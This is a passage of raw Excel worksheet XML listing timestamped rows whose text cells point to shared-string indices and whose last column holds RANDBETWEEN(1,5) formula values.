      </c>
      <c r="F22148">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22149" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22149" s="1">
        <v>43054.36855324074</v>
      </c>
      <c r="C22149" t="s">
        <v>10</v>
      </c>
      <c r="D22149" t="s">
        <v>23</v>
      </c>
      <c r="E22149" t="s">
        <v>19993</v>
      </c>
      <c r="F22149">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22150" s="1">
        <v>43054.367037037038</v>
      </c>
      <c r="C22150" t="s">
        <v>10</v>
      </c>
      <c r="D22150" t="s">
        <v>178</v>
      </c>
      <c r="E22150" t="s">
        <v>19994</v>
      </c>
      <c r="F22150">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22151" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A22151" s="1">
        <v>43054.285567129627</v>
      </c>
      <c r="C22151" t="s">
        <v>10</v>
      </c>
      <c r="D22151" t="s">
        <v>52</v>
      </c>
      <c r="E22151" s="2" t="s">
        <v>19949</v>
      </c>
      <c r="F22151">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22152" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22152" s="1">
        <v>43054.204687500001</v>
      </c>
      <c r="C22152" t="s">
        <v>17</v>
      </c>
      <c r="E22152" s="2" t="s">
        <v>19995</v>
      </c>
      <c r="F22152">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22153" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22153" s="1">
        <v>43054.192453703705</v>
      </c>
      <c r="C22153" t="s">
        <v>124</v>
      </c>
      <c r="E22153" s="2" t="s">
        <v>19996</v>
      </c>
      <c r="F22153">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22154" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22154" s="1">
        <v>43054.182303240741</v>
      </c>
      <c r="C22154" t="s">
        <v>535</v>
      </c>
      <c r="E22154" s="2" t="s">
        <v>19997</v>
      </c>
      <c r="F22154">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22155" s="1">
        <v>43054.177210648151</v>
      </c>
      <c r="C22155" t="s">
        <v>41</v>
      </c>
      <c r="E22155" t="s">
        <v>19998</v>
      </c>
      <c r="F22155">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22156" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22156" s="1">
        <v>43054.172083333331</v>
      </c>
      <c r="C22156" t="s">
        <v>1056</v>
      </c>
      <c r="E22156" s="2" t="s">
        <v>19999</v>
      </c>
      <c r="F22156">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22157" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22157" s="1">
        <v>43054.170439814814</v>
      </c>
      <c r="C22157" t="s">
        <v>4963</v>
      </c>
      <c r="E22157" s="2" t="s">
        <v>20000</v>
      </c>
      <c r="F22157">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22158" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A22158" s="1">
        <v>43054.163819444446</v>
      </c>
      <c r="C22158" t="s">
        <v>65</v>
      </c>
      <c r="E22158" s="2" t="s">
        <v>20001</v>
      </c>
      <c r="F22158">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22159" s="1">
        <v>43054.056770833333</v>
      </c>
      <c r="C22159" t="s">
        <v>10</v>
      </c>
      <c r="D22159" t="s">
        <v>381</v>
      </c>
      <c r="E22159" t="s">
        <v>20002</v>
      </c>
      <c r="F22159">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22160" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22160" s="1">
        <v>43053.987187500003</v>
      </c>
      <c r="C22160" t="s">
        <v>229</v>
      </c>
      <c r="E22160" s="2" t="s">
        <v>20003</v>
      </c>
      <c r="F22160">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22161" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22161" s="1">
        <v>43053.92386574074</v>
      </c>
      <c r="C22161" t="s">
        <v>4963</v>
      </c>
      <c r="D22161" t="s">
        <v>713</v>
      </c>
      <c r="E22161" s="2" t="s">
        <v>20004</v>
      </c>
      <c r="F22161">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22162" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22162" s="1">
        <v>43053.90966435185</v>
      </c>
      <c r="C22162" t="s">
        <v>41</v>
      </c>
      <c r="E22162" t="s">
        <v>20005</v>
      </c>
      <c r="F22162">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22163" s="1">
        <v>43053.839687500003</v>
      </c>
      <c r="C22163" t="s">
        <v>6</v>
      </c>
      <c r="D22163" t="s">
        <v>821</v>
      </c>
      <c r="E22163" t="s">
        <v>20006</v>
      </c>
      <c r="F22163">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22164" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A22164" s="1">
        <v>43053.831122685187</v>
      </c>
      <c r="C22164" t="s">
        <v>3027</v>
      </c>
      <c r="D22164" t="s">
        <v>290</v>
      </c>
      <c r="E22164" s="2" t="s">
        <v>20007</v>
      </c>
      <c r="F22164">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22165" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22165" s="1">
        <v>43053.820868055554</v>
      </c>
      <c r="C22165" t="s">
        <v>140</v>
      </c>
      <c r="D22165" t="s">
        <v>141</v>
      </c>
      <c r="E22165" t="s">
        <v>20008</v>
      </c>
      <c r="F22165">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22166" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22166" s="1">
        <v>43053.793136574073</v>
      </c>
      <c r="C22166" t="s">
        <v>10</v>
      </c>
      <c r="D22166" t="s">
        <v>263</v>
      </c>
      <c r="E22166" t="s">
        <v>20009</v>
      </c>
      <c r="F22166">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22167" s="1">
        <v>43053.713171296295</v>
      </c>
      <c r="C22167" t="s">
        <v>8872</v>
      </c>
      <c r="D22167" t="s">
        <v>1160</v>
      </c>
      <c r="E22167" t="s">
        <v>9776</v>
      </c>
      <c r="F22167">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22168" s="1">
        <v>43053.696550925924</v>
      </c>
      <c r="C22168" t="s">
        <v>10</v>
      </c>
      <c r="D22168" t="s">
        <v>158</v>
      </c>
      <c r="E22168" t="s">
        <v>20010</v>
      </c>
      <c r="F22168">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22169" s="1">
        <v>43053.692662037036</v>
      </c>
      <c r="C22169" t="s">
        <v>10</v>
      </c>
      <c r="D22169" t="s">
        <v>330</v>
      </c>
      <c r="E22169" t="s">
        <v>20011</v>
      </c>
      <c r="F22169">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22170" s="1">
        <v>43053.692048611112</v>
      </c>
      <c r="C22170" t="s">
        <v>10</v>
      </c>
      <c r="D22170" t="s">
        <v>17</v>
      </c>
      <c r="E22170" t="s">
        <v>20012</v>
      </c>
      <c r="F22170">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22171" s="1">
        <v>43053.688692129632</v>
      </c>
      <c r="C22171" t="s">
        <v>10</v>
      </c>
      <c r="D22171" t="s">
        <v>229</v>
      </c>
      <c r="E22171" t="s">
        <v>20013</v>
      </c>
      <c r="F22171">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22172" s="1">
        <v>43053.671412037038</v>
      </c>
      <c r="C22172" t="s">
        <v>10</v>
      </c>
      <c r="D22172" t="s">
        <v>178</v>
      </c>
      <c r="E22172" t="s">
        <v>20014</v>
      </c>
      <c r="F22172">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22173" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22173" s="1">
        <v>43053.664409722223</v>
      </c>
      <c r="C22173" t="s">
        <v>10</v>
      </c>
      <c r="D22173" t="s">
        <v>36</v>
      </c>
      <c r="E22173" s="2" t="s">
        <v>20015</v>
      </c>
      <c r="F22173">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22174" s="1">
        <v>43053.66269675926</v>
      </c>
      <c r="C22174" t="s">
        <v>10</v>
      </c>
      <c r="D22174" t="s">
        <v>20</v>
      </c>
      <c r="E22174" t="s">
        <v>20016</v>
      </c>
      <c r="F22174">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22175" s="1">
        <v>43053.662511574075</v>
      </c>
      <c r="C22175" t="s">
        <v>65</v>
      </c>
      <c r="D22175" t="s">
        <v>367</v>
      </c>
      <c r="E22175" t="s">
        <v>20017</v>
      </c>
      <c r="F22175">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22176" s="1">
        <v>43053.658518518518</v>
      </c>
      <c r="C22176" t="s">
        <v>9609</v>
      </c>
      <c r="D22176" t="s">
        <v>124</v>
      </c>
      <c r="E22176" t="s">
        <v>20018</v>
      </c>
      <c r="F22176">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22177" s="1">
        <v>43053.645451388889</v>
      </c>
      <c r="C22177" t="s">
        <v>10</v>
      </c>
      <c r="D22177" t="s">
        <v>163</v>
      </c>
      <c r="E22177" t="s">
        <v>20019</v>
      </c>
      <c r="F22177">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22178" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22178" s="1">
        <v>43053.636817129627</v>
      </c>
      <c r="C22178" t="s">
        <v>10</v>
      </c>
      <c r="D22178" t="s">
        <v>36</v>
      </c>
      <c r="E22178" s="2" t="s">
        <v>20020</v>
      </c>
      <c r="F22178">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22179" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22179" s="1">
        <v>43053.634837962964</v>
      </c>
      <c r="C22179" t="s">
        <v>280</v>
      </c>
      <c r="D22179" t="s">
        <v>33</v>
      </c>
      <c r="E22179" s="2" t="s">
        <v>20021</v>
      </c>
      <c r="F22179">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22180" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22180" s="1">
        <v>43053.632395833331</v>
      </c>
      <c r="C22180" t="s">
        <v>565</v>
      </c>
      <c r="D22180" t="s">
        <v>82</v>
      </c>
      <c r="E22180" s="2" t="s">
        <v>20022</v>
      </c>
      <c r="F22180">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22181" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A22181" s="1">
        <v>43053.623101851852</v>
      </c>
      <c r="C22181" t="s">
        <v>6829</v>
      </c>
      <c r="D22181" t="s">
        <v>46</v>
      </c>
      <c r="E22181" s="2" t="s">
        <v>20023</v>
      </c>
      <c r="F22181">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22182" s="1">
        <v>43053.618773148148</v>
      </c>
      <c r="C22182" t="s">
        <v>10</v>
      </c>
      <c r="D22182" t="s">
        <v>89</v>
      </c>
      <c r="E22182" t="s">
        <v>20024</v>
      </c>
      <c r="F22182">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22183" s="1">
        <v>43053.606979166667</v>
      </c>
      <c r="C22183" t="s">
        <v>10</v>
      </c>
      <c r="D22183" t="s">
        <v>86</v>
      </c>
      <c r="E22183" t="s">
        <v>20025</v>
      </c>
      <c r="F22183">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22184" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22184" s="1">
        <v>43053.605740740742</v>
      </c>
      <c r="C22184" t="s">
        <v>6</v>
      </c>
      <c r="D22184" t="s">
        <v>25</v>
      </c>
      <c r="E22184" t="s">
        <v>20026</v>
      </c>
      <c r="F22184">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22185" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22185" s="1">
        <v>43053.599594907406</v>
      </c>
      <c r="C22185" t="s">
        <v>10</v>
      </c>
      <c r="D22185" t="s">
        <v>20</v>
      </c>
      <c r="E22185" s="2" t="s">
        <v>20027</v>
      </c>
      <c r="F22185">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22186" s="1">
        <v>43053.593217592592</v>
      </c>
      <c r="C22186" t="s">
        <v>10</v>
      </c>
      <c r="D22186" t="s">
        <v>86</v>
      </c>
      <c r="E22186" t="s">
        <v>20028</v>
      </c>
      <c r="F22186">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22187" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22187" s="1">
        <v>43053.590127314812</v>
      </c>
      <c r="C22187" t="s">
        <v>10</v>
      </c>
      <c r="D22187" t="s">
        <v>56</v>
      </c>
      <c r="E22187" s="2" t="s">
        <v>20029</v>
      </c>
      <c r="F22187">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22188" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22188" s="1">
        <v>43053.586388888885</v>
      </c>
      <c r="C22188" t="s">
        <v>10</v>
      </c>
      <c r="D22188" t="s">
        <v>229</v>
      </c>
      <c r="E22188" s="2" t="s">
        <v>20030</v>
      </c>
      <c r="F22188">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22189" s="1">
        <v>43053.5858912037</v>
      </c>
      <c r="C22189" t="s">
        <v>10</v>
      </c>
      <c r="D22189" t="s">
        <v>229</v>
      </c>
      <c r="F22189">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22190" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22190" s="1">
        <v>43053.585543981484</v>
      </c>
      <c r="C22190" t="s">
        <v>10</v>
      </c>
      <c r="D22190" t="s">
        <v>158</v>
      </c>
      <c r="E22190" s="2" t="s">
        <v>20031</v>
      </c>
      <c r="F22190">
        <f t="shared" ca="1" si="346"/>
        <v>2</v>
      </c>
    </row>
    <row r="22191" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22191" s="1">
        <v>43053.540532407409</v>
      </c>
      <c r="C22191" t="s">
        <v>6</v>
      </c>
      <c r="D22191" t="s">
        <v>25</v>
      </c>
      <c r="E22191" s="2" t="s">
        <v>20032</v>
      </c>
      <c r="F22191">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22192" s="1">
        <v>43053.516550925924</v>
      </c>
      <c r="C22192" t="s">
        <v>48</v>
      </c>
      <c r="E22192" t="s">
        <v>20033</v>
      </c>
      <c r="F22192">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22193" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22193" s="1">
        <v>43053.497893518521</v>
      </c>
      <c r="C22193" t="s">
        <v>318</v>
      </c>
      <c r="E22193" s="2" t="s">
        <v>20034</v>
      </c>
      <c r="F22193">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22194" s="1">
        <v>43053.489386574074</v>
      </c>
      <c r="C22194" t="s">
        <v>10</v>
      </c>
      <c r="D22194" t="s">
        <v>112</v>
      </c>
      <c r="E22194" t="s">
        <v>20035</v>
      </c>
      <c r="F22194">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22195" s="1">
        <v>43053.48810185185</v>
      </c>
      <c r="C22195" t="s">
        <v>10</v>
      </c>
      <c r="D22195" t="s">
        <v>158</v>
      </c>
      <c r="E22195" t="s">
        <v>20036</v>
      </c>
      <c r="F22195">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22196" s="1">
        <v>43053.462256944447</v>
      </c>
      <c r="C22196" t="s">
        <v>10</v>
      </c>
      <c r="D22196" t="s">
        <v>6</v>
      </c>
      <c r="E22196" t="s">
        <v>20037</v>
      </c>
      <c r="F22196">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22197" s="1">
        <v>43053.449131944442</v>
      </c>
      <c r="C22197" t="s">
        <v>559</v>
      </c>
      <c r="E22197" t="s">
        <v>20038</v>
      </c>
      <c r="F22197">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22198" s="1">
        <v>43053.442870370367</v>
      </c>
      <c r="C22198" t="s">
        <v>10</v>
      </c>
      <c r="D22198" t="s">
        <v>86</v>
      </c>
      <c r="E22198" t="s">
        <v>20039</v>
      </c>
      <c r="F22198">
        <f t="shared" ca="1" si="346"/>
        <v>3</v>
      </c>
    </row>
    <row r="22199" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A22199" s="1">
        <v>43053.427488425928</v>
      </c>
      <c r="C22199" t="s">
        <v>48</v>
      </c>
      <c r="E22199" s="2" t="s">
        <v>20040</v>
      </c>
      <c r="F22199">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22200" s="1">
        <v>43053.411597222221</v>
      </c>
      <c r="C22200" t="s">
        <v>10</v>
      </c>
      <c r="D22200" t="s">
        <v>17</v>
      </c>
      <c r="E22200" t="s">
        <v>20041</v>
      </c>
      <c r="F22200">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22201" s="1">
        <v>43053.40519675926</v>
      </c>
      <c r="C22201" t="s">
        <v>10</v>
      </c>
      <c r="D22201" t="s">
        <v>107</v>
      </c>
      <c r="E22201" t="s">
        <v>20042</v>
      </c>
      <c r="F22201">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22202" s="1">
        <v>43053.404942129629</v>
      </c>
      <c r="C22202" t="s">
        <v>10</v>
      </c>
      <c r="D22202" t="s">
        <v>94</v>
      </c>
      <c r="E22202" t="s">
        <v>20043</v>
      </c>
      <c r="F22202">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22203" s="1">
        <v>43053.403877314813</v>
      </c>
      <c r="C22203" t="s">
        <v>10</v>
      </c>
      <c r="D22203" t="s">
        <v>89</v>
      </c>
      <c r="E22203" t="s">
        <v>20044</v>
      </c>
      <c r="F22203">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22204" s="1">
        <v>43053.403055555558</v>
      </c>
      <c r="C22204" t="s">
        <v>10</v>
      </c>
      <c r="D22204" t="s">
        <v>494</v>
      </c>
      <c r="E22204" t="s">
        <v>20045</v>
      </c>
      <c r="F22204">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22205" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22205" s="1">
        <v>43053.380196759259</v>
      </c>
      <c r="C22205" t="s">
        <v>41</v>
      </c>
      <c r="E22205" s="2" t="s">
        <v>20046</v>
      </c>
      <c r="F22205">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22206" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22206" s="1">
        <v>43053.341122685182</v>
      </c>
      <c r="C22206" t="s">
        <v>16</v>
      </c>
      <c r="E22206" s="2" t="s">
        <v>20047</v>
      </c>
      <c r="F22206">
        <f t="shared" ca="1" si="346"/>
        <v>5</v>
      </c>
    </row>
    <row r="22207" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A22207" s="1">
        <v>43053.339120370372</v>
      </c>
      <c r="C22207" t="s">
        <v>41</v>
      </c>
      <c r="E22207" s="2" t="s">
        <v>20048</v>
      </c>
      <c r="F22207">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22208" s="1">
        <v>43053.313854166663</v>
      </c>
      <c r="C22208" t="s">
        <v>97</v>
      </c>
      <c r="E22208" t="s">
        <v>20049</v>
      </c>
      <c r="F22208">
        <f t="shared" ca="1" si="346"/>
        <v>4</v>
      </c>
    </row>
    <row r="22209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22209" s="1">
        <v>43053.262199074074</v>
      </c>
      <c r="C22209" t="s">
        <v>41</v>
      </c>
      <c r="E22209" t="s">
        <v>20050</v>
      </c>
      <c r="F22209">
        <f t="shared" ca="1" si="346"/>
        <v>1</v>
      </c>
    </row>
    <row r="22210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22210" s="1">
        <v>43053.258263888885</v>
      </c>
      <c r="C22210" t="s">
        <v>344</v>
      </c>
      <c r="E22210" t="s">
        <v>20051</v>
      </c>
      <c r="F22210">
        <f t="shared" ref="F22210:F22273" ca="1" si="347">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="22211" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A22211" s="1">
        <v>43053.256655092591</v>
      </c>
      <c r="C22211" t="s">
        <v>71</v>
      </c>
      <c r="E22211" s="2" t="s">
        <v>20052</v>
      </c>
      <c r="F22211">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22212" s="1">
        <v>43053.18310185185</v>
      </c>
      <c r="C22212" t="s">
        <v>124</v>
      </c>
      <c r="E22212" t="s">
        <v>20053</v>
      </c>
      <c r="F22212">
        <f t="shared" ca="1" si="347"/>
        <v>1</v>
      </c>
    </row>
    <row r="22213" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22213" s="1">
        <v>43053.146874999999</v>
      </c>
      <c r="C22213" t="s">
        <v>776</v>
      </c>
      <c r="E22213" s="2" t="s">
        <v>20054</v>
      </c>
      <c r="F22213">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22214" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22214" s="1">
        <v>43053.139108796298</v>
      </c>
      <c r="C22214" t="s">
        <v>10</v>
      </c>
      <c r="D22214" t="s">
        <v>52</v>
      </c>
      <c r="E22214" s="2" t="s">
        <v>20055</v>
      </c>
      <c r="F22214">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22215" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22215" s="1">
        <v>43053.113553240742</v>
      </c>
      <c r="C22215" t="s">
        <v>50</v>
      </c>
      <c r="E22215" s="2" t="s">
        <v>20056</v>
      </c>
      <c r="F22215">
        <f t="shared" ca="1" si="347"/>
        <v>4</v>
      </c>
    </row>
    <row r="22216" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A22216" s="1">
        <v>43053.064641203702</v>
      </c>
      <c r="C22216" t="s">
        <v>10</v>
      </c>
      <c r="D22216" t="s">
        <v>6</v>
      </c>
      <c r="E22216" s="2" t="s">
        <v>20057</v>
      </c>
      <c r="F22216">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22217" s="1">
        <v>43053.015347222223</v>
      </c>
      <c r="C22217" t="s">
        <v>118</v>
      </c>
      <c r="E22217" t="s">
        <v>20058</v>
      </c>
      <c r="F22217">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22218" s="1">
        <v>43053.012476851851</v>
      </c>
      <c r="C22218" t="s">
        <v>45</v>
      </c>
      <c r="E22218" t="s">
        <v>20059</v>
      </c>
      <c r="F22218">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22219" s="1">
        <v>43052.984016203707</v>
      </c>
      <c r="C22219" t="s">
        <v>8872</v>
      </c>
      <c r="D22219" t="s">
        <v>194</v>
      </c>
      <c r="E22219" t="s">
        <v>20060</v>
      </c>
      <c r="F22219">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22220" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22220" s="1">
        <v>43052.975370370368</v>
      </c>
      <c r="C22220" t="s">
        <v>41</v>
      </c>
      <c r="E22220" s="2" t="s">
        <v>20061</v>
      </c>
      <c r="F22220">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22221" s="1">
        <v>43052.887650462966</v>
      </c>
      <c r="C22221" t="s">
        <v>410</v>
      </c>
      <c r="E22221" t="s">
        <v>20062</v>
      </c>
      <c r="F22221">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22222" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A22222" s="1">
        <v>43052.804467592592</v>
      </c>
      <c r="C22222" t="s">
        <v>6</v>
      </c>
      <c r="D22222" t="s">
        <v>25</v>
      </c>
      <c r="E22222" s="2" t="s">
        <v>20063</v>
      </c>
      <c r="F22222">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22223" s="1">
        <v>43052.767291666663</v>
      </c>
      <c r="C22223" t="s">
        <v>10</v>
      </c>
      <c r="D22223" t="s">
        <v>6</v>
      </c>
      <c r="E22223" t="s">
        <v>20064</v>
      </c>
      <c r="F22223">
        <f t="shared" ca="1" si="347"/>
        <v>2</v>
      </c>
    </row>
    <row r="22224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22224" s="1">
        <v>43052.711967592593</v>
      </c>
      <c r="C22224" t="s">
        <v>10</v>
      </c>
      <c r="D22224" t="s">
        <v>6</v>
      </c>
      <c r="E22224" t="s">
        <v>20065</v>
      </c>
      <c r="F22224">
        <f t="shared" ca="1" si="347"/>
        <v>3</v>
      </c>
    </row>
    <row r="22225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22225" s="1">
        <v>43052.698194444441</v>
      </c>
      <c r="C22225" t="s">
        <v>10</v>
      </c>
      <c r="D22225" t="s">
        <v>89</v>
      </c>
      <c r="E22225" t="s">
        <v>20066</v>
      </c>
      <c r="F22225">
        <f t="shared" ca="1" si="347"/>
        <v>5</v>
      </c>
    </row>
    <row r="22226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22226" s="1">
        <v>43052.67596064815</v>
      </c>
      <c r="C22226" t="s">
